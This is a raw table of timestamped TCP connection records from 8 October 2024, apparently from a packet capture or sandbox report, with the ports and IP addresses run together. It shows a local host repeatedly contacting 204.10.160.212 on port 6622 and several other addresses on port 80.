                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.326559067 CEST499566622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.331444025 CEST662249956204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.585763931 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.629511118 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.645131111 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.645941973 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.650160074 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.650823116 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.824840069 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.879446030 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.077646971 CEST4996380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.082875967 CEST804996334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.083643913 CEST4996380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.083837032 CEST4996380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.083837032 CEST4996380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.088715076 CEST804996334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.088866949 CEST804996334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.307182074 CEST804995218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.308111906 CEST804995218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.308274031 CEST4995280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.308274031 CEST4995280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.313071966 CEST804995218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.461944103 CEST4996680192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.466928959 CEST804996644.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.467097998 CEST4996680192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.467190981 CEST4996680192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.467216015 CEST4996680192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.472729921 CEST804996644.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.472743034 CEST804996644.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.888252974 CEST804998518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.888319016 CEST4998580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.891433001 CEST804998518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.301779985 CEST499976622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.307909966 CEST662249997204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.307991028 CEST499976622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.316235065 CEST499976622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.321176052 CEST662249997204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.376146078 CEST4999880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.381100893 CEST804999818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.381179094 CEST4999880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.381483078 CEST4999880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.381508112 CEST4999880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.386295080 CEST804999818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.386327028 CEST804999818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.863178015 CEST804999818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.863835096 CEST804999818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.863924026 CEST4999880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.864010096 CEST4999880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.868912935 CEST804999818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.145122051 CEST5000480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.150031090 CEST805000444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.150106907 CEST5000480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.150259972 CEST5000480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.150288105 CEST5000480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.155049086 CEST805000444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.155368090 CEST805000444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.206729889 CEST804999313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.207595110 CEST804999313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.207672119 CEST4999380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.207921028 CEST4999380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.212940931 CEST804999313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.344392061 CEST5000780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.349831104 CEST805000734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.352802992 CEST5000780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.352960110 CEST5000780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.352991104 CEST5000780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.358007908 CEST805000734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.358496904 CEST805000734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.787585020 CEST805000444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.787599087 CEST805000444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.787662983 CEST5000480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.787838936 CEST5000480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.788013935 CEST805000444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.788055897 CEST5000480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.793073893 CEST805000444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.807732105 CEST662249997204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.808726072 CEST499976622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.808793068 CEST499976622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.816833019 CEST662249997204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.095817089 CEST805000734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.095984936 CEST5000780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.096170902 CEST805000734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.096220970 CEST5000780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.100811005 CEST805000734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.137465954 CEST5001280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.142334938 CEST805001218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.344327927 CEST805003934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.344337940 CEST805003934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.461020947 CEST5004080192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.465941906 CEST805004013.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.466012001 CEST5004080192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.466185093 CEST5004080192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.466206074 CEST5004080192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.472240925 CEST805004013.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.472285032 CEST805004013.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.093199015 CEST805003934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.093777895 CEST805003934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.093818903 CEST5003980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.094291925 CEST5003980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.099097967 CEST805003934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.260237932 CEST5004680192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.265229940 CEST80500463.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.265291929 CEST5004680192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.265788078 CEST5004680192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.265824080 CEST5004680192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.270592928 CEST80500463.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.270798922 CEST80500463.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.748672962 CEST80500463.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.748853922 CEST5004680192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.749031067 CEST80500463.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.749111891 CEST5004680192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.750597954 CEST662250037204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.750659943 CEST500376622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.750705957 CEST500376622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.753868103 CEST80500463.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.755656958 CEST662250037204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.821372986 CEST805004013.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.821547985 CEST5004080192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.822619915 CEST805004013.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.822691917 CEST5004080192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.826735020 CEST805004013.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.961247921 CEST5005180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.966272116 CEST805005144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.966366053 CEST5005180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.970066071 CEST5005180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.970091105 CEST5005180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.975040913 CEST805005144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.975056887 CEST805005144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.094909906 CEST5005380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.099818945 CEST805005313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.099910021 CEST5005380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.100301027 CEST5005380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.100336075 CEST5005380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.105108023 CEST805005313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.105288029 CEST805005313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.445408106 CEST805005144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.445605040 CEST805005144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.445656061 CEST5005180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.445842028 CEST5005180192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.450917006 CEST805005144.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.554990053 CEST5005680192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.560182095 CEST80500563.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.560250998 CEST5005680192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.045006037 CEST805007547.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.045074940 CEST5007580192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.046549082 CEST5007580192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.051328897 CEST805007547.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.667332888 CEST5008980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.672238111 CEST805008913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.672346115 CEST5008980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.672519922 CEST5008980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.672548056 CEST5008980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.677468061 CEST805008913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.677476883 CEST805008913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.708983898 CEST662250077204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.709045887 CEST500776622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.709191084 CEST500776622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.713990927 CEST662250077204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.721455097 CEST805008334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.721570015 CEST805008334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.721597910 CEST5008380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.721659899 CEST5008380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.726495028 CEST805008334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.866580009 CEST5009080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.287465096 CEST805009047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.287564039 CEST5009080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.290257931 CEST5009080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.290714979 CEST5009080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.295897007 CEST805009047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.297399044 CEST805009047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.723579884 CEST500966622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.729011059 CEST662250096204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.729198933 CEST500966622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.733165979 CEST500966622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.738245010 CEST662250096204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.006650925 CEST805008913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.007028103 CEST5008980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.007102013 CEST805008913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.007152081 CEST5008980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.012182951 CEST805008913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.391959906 CEST5010280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.396836996 CEST805010234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.397001028 CEST5010280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.397072077 CEST5010280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.397072077 CEST5010280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.401886940 CEST805010234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.401911020 CEST805010234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.632180929 CEST805009047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.632328033 CEST5009080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.632874012 CEST805009047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.634572983 CEST5009080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.637352943 CEST805009047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.758637905 CEST5010380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.763549089 CEST805010318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.763614893 CEST5010380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.763788939 CEST5010380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.763806105 CEST5010380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.768543005 CEST805010318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.768990993 CEST805010318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.130628109 CEST805010234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.490767956 CEST5012880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.495325089 CEST805012818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.495569944 CEST805012818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.708878040 CEST662250115204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.709018946 CEST501156622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.709018946 CEST501156622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.713908911 CEST662250115204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.907075882 CEST80501233.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.907272100 CEST80501233.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.907366991 CEST5012380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.907812119 CEST5012380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.912787914 CEST80501233.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.212795019 CEST5013280192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.217645884 CEST805013285.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.217878103 CEST5013280192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.218652010 CEST5013280192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.218652010 CEST5013280192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.223603010 CEST805013285.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.223731041 CEST805013285.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.676742077 CEST501366622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.682141066 CEST662250136204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.684827089 CEST501366622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.691437006 CEST501366622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.696388960 CEST662250136204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.827528954 CEST805012818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.828114033 CEST805012818.141.10.107192.168.2.4
